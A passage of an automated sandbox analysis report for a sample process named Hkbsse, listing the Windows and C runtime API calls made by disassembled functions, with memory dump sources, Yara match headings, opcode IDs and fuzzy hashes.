                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 2d08f1c89283f971e2dbc99742b5c5d2ec6674a103a1ef792aed1683b5bdd9d4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: A84107729006009AEB11AFBA8C46B8E3775AF4A364F16151BF914A7292D63CC840476A
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00402F1F
                    • GetCurrentThreadId.KERNEL32 ref: 00402F3E
                    • __Mtx_unlock.LIBCPMT ref: 00402F8C
                    • __Cnd_broadcast.LIBCPMT ref: 00402FA3
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
                    • String ID:
                    • API String ID: 3471820992-0
                    • Opcode ID: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction ID: e825d9dc3a901559c5738fae14c527551fe8a17dfb067f9c5c2eb0eb023bb9bf
                    • Opcode Fuzzy Hash: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction Fuzzy Hash: 0241DFB09002069BCB20DB65CA45B9AB7F8FF14354F10453EE816E77C0EB78E900DB85
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction ID: d6b3a1ab5e5d11c2bef6ace4f7ff5923ae7d1f13d87393b1610c795640035b13
                    • Opcode Fuzzy Hash: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction Fuzzy Hash: A641BEB0A01615ABEF21EF65C98475BBBE8EF05724F00452ED815D7751EB35FA00CB81
                    APIs
                    • _free.LIBCMT ref: 044C63A5
                    • _free.LIBCMT ref: 044C63CE
                    • SetEndOfFile.KERNEL32(00000000,044C1D11,00000000,044BAF99,?,?,?,?,?,?,?,044C1D11,044BAF99,00000000), ref: 044C6400
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,044C1D11,044BAF99,00000000,?,?,?,?,00000000), ref: 044C641C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: b7ac0cee9e22b4d83e510ea66830d346220ef01fdfc2ddbc3ab4a2b448e25af4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: 3F41EC7A900A0196EF516FA5CC4169E3765EF84364F1D811FE454A72B1EE34F84287B1
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 9beed26a825f1ece50d1044237a9d26a4491e3443ab310ceb7be1a93bb172293
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: DF318B75A00319EFCF10DF94DAC0AAE7BB9BF44304F4504AADD01AB346D7B4A944EBA5
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044A3086
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 00761c298df1126d36ac374e1acc04d61c15a0f4aa9e96340426f89b03067e2d
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: A9315975A00309EFDF10DF95C8C8AAEBBB9BF54315F0404AADD41AB346E730A955DBA0
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043E9C9: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444E60,?,00000000,00000000), ref: 0043EA6B
                    • GetLastError.KERNEL32 ref: 0043DA5A
                    • __dosmaperr.LIBCMT ref: 0043DA61
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043DAA0
                    • __dosmaperr.LIBCMT ref: 0043DAA7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction ID: 3d9dcb479ea73530b4d2aa109c1a6950b544f6a37a2d41994a632baa8fad223f
                    • Opcode Fuzzy Hash: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction Fuzzy Hash: D521C7B1A082057F9B20BF66AD81D6BB7ADEF4C368F10911AF82597241D738EC418798
                    APIs
                      • Part of subcall function 044B6D43: _free.LIBCMT ref: 044B6D51
                      • Part of subcall function 044BEC30: WideCharToMultiByte.KERNEL32(044889D7,00000000,0045FBB0,00000000,044889D7,044889D7,044C0959,?,0045FBB0,?,00000000,?,044C06C8,0000FDE9,00000000,?), ref: 044BECD2
                    • GetLastError.KERNEL32 ref: 044BDCC1
                    • __dosmaperr.LIBCMT ref: 044BDCC8
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 044BDD07
                    • __dosmaperr.LIBCMT ref: 044BDD0E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction ID: cb16ab5264d50d0b989fe54cdd4dbb98de30d93aac65698f8b3895a6291f6488
                    • Opcode Fuzzy Hash: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction Fuzzy Hash: 0221C9B1A046056FBF215F66DC808E7B7ACEF44268310455AE8E997241E731FC0187F0
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 00430BFA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430BE2
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430C5D
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 00430C62
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 57bdfcda8ae773349b13e319bab3268c626313179c611564d1a2f16d6c6a901f
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: 52214635700228AFCB14EB59DC45D6EB3BCEF48325F10025BFA15A3392CA74AD018AAD
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 00429DAC
                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429DF8
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E0E
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E7A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                    • String ID:
                    • API String ID: 2033596534-0
                    • Opcode ID: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction ID: 4e4e7a5eb7143f9fbb3103a1f6126f4c5a38472fe452da36fe41685c322f6648
                    • Opcode Fuzzy Hash: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction Fuzzy Hash: 5A21C771A04124DFDB04EFA5E88299E77B4BF05314F61402FF401AB291DB396D45CB9D
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 044AA013
                    • std::bad_exception::bad_exception.LIBCMT ref: 044AA075
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 044AA0B7
                    • std::bad_exception::bad_exception.LIBCMT ref: 044AA0E1
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID:
                    • API String ID: 3836581985-0
                    • Opcode ID: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction ID: 992ffeae27417c188d8c0943b1fb98b755a7204df85ed261575d3102eb21fef0
                    • Opcode Fuzzy Hash: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction Fuzzy Hash: C221AE72904604AFEF05EFA4D88499DB7F4AF24318F10402FE401BB291EB317D16CB55
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: af48699c100b34bee2eea396ddf61153eca23784d7c583d1e67b1dc7e68ad36d
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: 5E21C332A01764ABDF318E64AC45B9B3758DB01769F244122E986A7791E630FD0186F5
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 044A5278
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044A529B
                    • __EH_prolog3.LIBCMT ref: 044A52B6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 044A52DD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction ID: 77085ea5829f75a300bb8061d9c6f0efa4f917a9be86d5fc4a1fb447e21fa986
                    • Opcode Fuzzy Hash: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction Fuzzy Hash: FB21BC35A00204EFDF14EF99C980AADB7A5BF58318F10402BE5069B291CB71BE11CB51
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004314D4
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                      • Part of subcall function 0042842B: SafeRWList.LIBCONCRT ref: 0042843C
                    • SafeRWList.LIBCONCRT ref: 004314CA
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004314EA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: 32539ca2320707ce92c09178d01679dab9e49ab6512ed056795bb6ab421abb97
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: EC21F53160020EDFC704DF24C880EA5FBA9FB98318F54E2ABD4054B152DB39E99ACB94
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044B173B
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044B16EC
                      • Part of subcall function 044A8692: SafeRWList.LIBCONCRT ref: 044A86A3
                    • SafeRWList.LIBCONCRT ref: 044B1731
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044B1751
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: eb2c4861ed263411e3ee2acce07d984738524a24f9833e2a6fad4252869c5e7e
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: 3921A17160020A9BDB04DF24C890EA5FBE9FB84258F14D2ABD4054B242E731F99ACBD0
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: e6a7898286a1be447bf8acee699c1bfb8ba658b674e85a6154236f9f7398ed47
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: E5110B31A02324ABDF314F649C44A9F37589F01760F161127E896A7391EF70FD0286F6
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F41F
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F440
                      • Part of subcall function 004202C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004202DE
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F45C
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F463
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: c143f49b80a8edc336b5adb3e2ea19dd9ba997e834122e1f90eeb7ad8e6c388c
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 3B018E71900305BBD7207F6ACC819DBBBA8DF20358B10893FF85492142D778998A87AD
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0449F686
                      • Part of subcall function 0449F842: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 044A57FD
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0449F6A7
                      • Part of subcall function 044A0529: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044A0545
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0449F6C3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0449F6CA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: 4a1c5eb9cb96cbb66880b058e080efde8755d9d624b3b9afd41223599d1500ba
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: AF01D6725003057FEF20BF5A8C8099BBFE8DF25358B10453FA855D2292D770BD4A97A5
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004334E9
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004334FD
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433515
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043352D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: b333cc5f23de22d3145c9e3758e484d235afa0bb9630b9fa484c080b45391314
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: CF012636700514B7CF16EE5AC842EAF77A99F58364F00001BFC12EB382DA75EE01C2A5
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044B3750
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 044B3764
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044B377C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B3794
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: 1b3baa19196436d146281e5aba4025cb5f66fcbc23a7c32b8d4aef97c82383e1
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: AD012672700114B7DF25AE9B8840AEFB7A9AF44254F00401BEC95EB381D930FD1196F0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B802
                    • GetLastError.KERNEL32(?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104,?), ref: 0043B80C
                    • __dosmaperr.LIBCMT ref: 0043B813
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: eea697dc5ee5a63e9bb000b8ca0ecb04d52ee882e46ab181b6f30ec3310184b0
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: E4F08132600615BB8B252FA2DC08E5BBF6DFF483A0B109526F61CC7520D735E861CBD8
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001), ref: 0043B86B
                    • GetLastError.KERNEL32(?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104), ref: 0043B875
                    • __dosmaperr.LIBCMT ref: 0043B87C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 1fe541eff6bd0899817d30d0916f77e4946d01b6b56965e1649de8632fa44e19
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 44F08631600615BBDB256FB6DC04A47BF6DFF483A1B005526F618D7520D739E851C7D8
                    APIs
                      • Part of subcall function 00420076: TlsGetValue.KERNEL32(?,?,0041F5F7,0041F424,?,?), ref: 0042007C
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042513F
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E446
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E45F
                      • Part of subcall function 0042E41F: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E4D5
                      • Part of subcall function 0042E41F: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E4DD
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042514D
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425157
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425161
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: 3766eabf401ff52a77b5129f6dfad517b3767f028463115b44bbc9b501536ea0
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: E4F0F635B0093427CA25B667B812D6EB7659F90B14B84012FF51153292DF7C9E15C7CD
                    APIs
                      • Part of subcall function 044A02DD: TlsGetValue.KERNEL32(?,?,0449F85E,0449F68B,?,?), ref: 044A02E3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 044A53A6
                      • Part of subcall function 044AE686: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044AE6AD
                      • Part of subcall function 044AE686: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044AE6C6
